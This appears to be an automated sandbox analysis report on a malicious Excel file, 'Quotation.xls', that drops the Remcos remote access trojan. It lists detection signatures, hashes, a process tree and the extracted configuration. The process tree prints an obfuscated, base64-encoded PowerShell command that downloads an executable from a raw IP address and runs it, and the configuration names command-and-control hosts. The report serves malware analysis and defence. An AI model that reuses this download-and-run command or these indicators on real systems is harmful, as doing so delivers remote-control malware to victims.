Edit tour
Windows
Analysis Report
Quotation.xls
Overview
General Information
| Sample name: | Quotation.xls |
| Analysis ID: | 1467089 |
| MD5: | 93728a4082d57c877a1d0ece7c233e42 |
| SHA1: | d549cf4aa78a533c6f1426a69ee20b6e2f835f10 |
| SHA256: | 559122ff10dc062b44d239d7867a47266f0b8b1088df6551dcfa0f75eb1014bb |
| Tags: | xls |
| Infos: |   |
 | |
Detection
Remcos
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
.NET source code references suspicious native API functions
AI detected suspicious Excel or Word document
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Searches for Windows Mail specific files
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w7x64
EXCEL.EXE (PID: 1252 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) 
mshta.exe (PID: 2040 cmdline: C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) 
cmd.exe (PID: 1260 cmdline: "C:\Window s\system32 \cmd.exe" "/c POWeRs hElL - EX Byp ass -n OP -w 1 -c DeV icECREDENt iAldePLoym eNT ; iEx($( iEx('[SYst em.teXT.En CoDInG]'+[ chaR]0x3A+ [cHAR]0X3a +'utf8.get StriNG([Sy STEm.COnvE Rt]'+[cHaR ]58+[CHar] 0X3a+'fROM baSE64StRI ng('+[cHAr ]34+'JHpBW lhKTXJMICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICA9ICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBhZEQ tVHlwRSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLW1FT UJlUmRFZml uSXRJb24gI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICdbR GxsSW1wb3J 0KCJ1ckxtb 24uRGxMIiw gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIEN oYXJTZXQgP SBDaGFyU2V 0LlVuaWNvZ GUpXXB1Ymx pYyBzdGF0a WMgZXh0ZXJ uIEludFB0c iBVUkxEb3d ubG9hZFRvR mlsZShJbnR QdHIgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIGdrYSxzd HJpbmcgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIEpEYnp heWJLY0osc 3RyaW5nICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBnbSx 1aW50ICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBEdXpsV 3FiV2hYQyx JbnRQdHIgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIFVmK TsnICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAtTkFtZSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgInR CIiAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLU5hbUVzc GFjZSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgTXJYZHN vICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA tUGFzc1Roc nU7ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAkekFaWEp Nckw6OlVST ERvd25sb2F kVG9GaWxlK DAsImh0dHA 6Ly8xNzIuM jQ1LjEzNS4 xNTUvVDAyM DdXL2NzcnN zLmV4ZSIsI iRlblY6QVB QREFUQVxpZ 2NjdS5leGU iLDAsMCk7c 3RhUnQtU0x lRXAoMyk7c 1RhcnQgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICIkRW5 2OkFQUERBV EFcaWdjY3U uZXhlIg==' +[chaR]34+ '))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) 
powershell.exe (PID: 2196 cmdline: POWeRshElL -EX Bypass -nOP -w 1 -c DeVicEC REDENtiAld ePLoymeNT ; iEx($(iEx( '[SYstem.t eXT.EnCoDI nG]'+[chaR ]0x3A+[cHA R]0X3a+'ut f8.getStri NG([SySTEm .COnvERt]' +[cHaR]58+ [CHar]0X3a +'fROMbaSE 64StRIng(' +[cHAr]34+ 'JHpBWlhKT XJMICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CA9ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBhZEQtVHl wRSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLW1FTUJlU mRFZmluSXR Jb24gICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICdbRGxsS W1wb3J0KCJ 1ckxtb24uR GxMIiwgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIENoYXJ TZXQgPSBDa GFyU2V0LlV uaWNvZGUpX XB1YmxpYyB zdGF0aWMgZ Xh0ZXJuIEl udFB0ciBVU kxEb3dubG9 hZFRvRmlsZ ShJbnRQdHI gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIGd rYSxzdHJpb mcgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI EpEYnpheWJ LY0osc3Rya W5nICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBnbSx1aW5 0ICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB EdXpsV3FiV 2hYQyxJbnR QdHIgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIFVmKTsnI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtT kFtZSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgInRCIiA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLU5 hbUVzcGFjZ SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgT XJYZHNvICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAtUGF zc1RocnU7I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAke kFaWEpNckw 6OlVSTERvd 25sb2FkVG9 GaWxlKDAsI mh0dHA6Ly8 xNzIuMjQ1L jEzNS4xNTU vVDAyMDdXL 2NzcnNzLmV 4ZSIsIiRlb lY6QVBQREF UQVxpZ2Njd S5leGUiLDA sMCk7c3RhU nQtU0xlRXA oMyk7c1Rhc nQgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CIkRW52OkF QUERBVEFca WdjY3UuZXh lIg=='+[ch aR]34+'))' )))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) 
csc.exe (PID: 3128 cmdline: "C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\nsccvp b0\nsccvpb 0.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3136 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES25D9.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\nsc cvpb0\CSC7 FE4A73D64A C4B32BC98E 072D7992CA F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - igccu.exe (PID: 3244 cmdline:
"C:\Users\ user\AppDa ta\Roaming \igccu.exe " MD5: A2DCC2E9DD81E3A5F6440ED7027A86DA) - ngen.exe (PID: 3340 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\nge n.exe" MD5: 04C571D6C0F352ADAC5E61F4EBA2665A) - csc.exe (PID: 3352 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" MD5: F8F36858B9405FBE27377FD7E8FEC2F2) wab.exe (PID: 3360 cmdline:
"C:\Progra m Files (x 86)\Window s Mail\wab .exe" MD5: EF162817C730DB9355F6C28F2445D206) "C:\Progra m Files (x 86)\Window s Mail\wab .exe" MD5: EF162817C730DB9355F6C28F2445D206) - mshta.exe (PID: 3572 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - cmd.exe (PID: 3668 cmdline:
"C:\Window s\system32 \cmd.exe" "/c POWeRs hElL - EX Byp ass -n OP -w 1 -c DeV icECREDENt iAldePLoym eNT ; iEx($( iEx('[SYst em.teXT.En CoDInG]'+[ chaR]0x3A+ [cHAR]0X3a +'utf8.get StriNG([Sy STEm.COnvE Rt]'+[cHaR ]58+[CHar] 0X3a+'fROM baSE64StRI ng('+[cHAr ]34+'JHpBW lhKTXJMICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICA9ICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBhZEQ tVHlwRSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLW1FT UJlUmRFZml uSXRJb24gI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICdbR GxsSW1wb3J 0KCJ1ckxtb 24uRGxMIiw gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIEN oYXJTZXQgP SBDaGFyU2V 0LlVuaWNvZ GUpXXB1Ymx pYyBzdGF0a WMgZXh0ZXJ uIEludFB0c iBVUkxEb3d ubG9hZFRvR mlsZShJbnR QdHIgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIGdrYSxzd HJpbmcgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIEpEYnp heWJLY0osc 3RyaW5nICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBnbSx 1aW50ICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBEdXpsV 3FiV2hYQyx JbnRQdHIgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIFVmK TsnICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAtTkFtZSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgInR CIiAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLU5hbUVzc GFjZSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgTXJYZHN vICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA tUGFzc1Roc nU7ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAkekFaWEp Nckw6OlVST ERvd25sb2F kVG9GaWxlK DAsImh0dHA 6Ly8xNzIuM jQ1LjEzNS4 xNTUvVDAyM DdXL2NzcnN zLmV4ZSIsI iRlblY6QVB QREFUQVxpZ 2NjdS5leGU iLDAsMCk7c 3RhUnQtU0x lRXAoMyk7c 1RhcnQgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICIkRW5 2OkFQUERBV EFcaWdjY3U uZXhlIg==' +[chaR]34+ '))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - powershell.exe (PID: 3692 cmdline:
POWeRshElL -EX Bypass -nOP -w 1 -c DeVicEC REDENtiAld ePLoymeNT ; iEx($(iEx( '[SYstem.t eXT.EnCoDI nG]'+[chaR ]0x3A+[cHA R]0X3a+'ut f8.getStri NG([SySTEm .COnvERt]' +[cHaR]58+ [CHar]0X3a +'fROMbaSE 64StRIng(' +[cHAr]34+ 'JHpBWlhKT XJMICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CA9ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBhZEQtVHl wRSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLW1FTUJlU mRFZmluSXR Jb24gICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICdbRGxsS W1wb3J0KCJ 1ckxtb24uR GxMIiwgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIENoYXJ TZXQgPSBDa GFyU2V0LlV uaWNvZGUpX XB1YmxpYyB zdGF0aWMgZ Xh0ZXJuIEl udFB0ciBVU kxEb3dubG9 hZFRvRmlsZ ShJbnRQdHI gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIGd rYSxzdHJpb mcgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI EpEYnpheWJ LY0osc3Rya W5nICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBnbSx1aW5 0ICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB EdXpsV3FiV 2hYQyxJbnR QdHIgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIFVmKTsnI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtT kFtZSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgInRCIiA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLU5 hbUVzcGFjZ SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgT XJYZHNvICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAtUGF zc1RocnU7I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAke kFaWEpNckw 6OlVSTERvd 25sb2FkVG9 GaWxlKDAsI mh0dHA6Ly8 xNzIuMjQ1L jEzNS4xNTU vVDAyMDdXL 2NzcnNzLmV 4ZSIsIiRlb lY6QVBQREF UQVxpZ2Njd S5leGUiLDA sMCk7c3RhU nQtU0xlRXA oMyk7c1Rhc nQgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CIkRW52OkF QUERBVEFca WdjY3UuZXh lIg=='+[ch aR]34+'))' )))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 3780 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\czjog1 ic\czjog1i c.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3788 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES85A4.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\czj og1ic\CSCE 6080EA75C6 5453BAA6F2 713EF82B3D .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - igccu.exe (PID: 3836 cmdline:
"C:\Users\ user\AppDa ta\Roaming \igccu.exe " MD5: A2DCC2E9DD81E3A5F6440ED7027A86DA) 
iexplore.exe (PID: 3884 cmdline: "C:\Progra m Files (x 86)\Intern et Explore r\iexplore .exe" MD5: 8A590F790A98F3D77399BE457E01386A)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": "bossnacarpet.com:2556:1vegetachcnc.com:2556:1", "Assigned name": "2556", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "chrome-6W1HCC", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
| Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
| REMCOS_RAT_variants | unknown | unknown |
| |
| Click to see the 39 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
| Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
| REMCOS_RAT_variants | unknown | unknown |
| |
| INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
| |
| Click to see the 58 entries | ||||
System Summary |   |
|---|
| Source: | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Michael Haag: | ||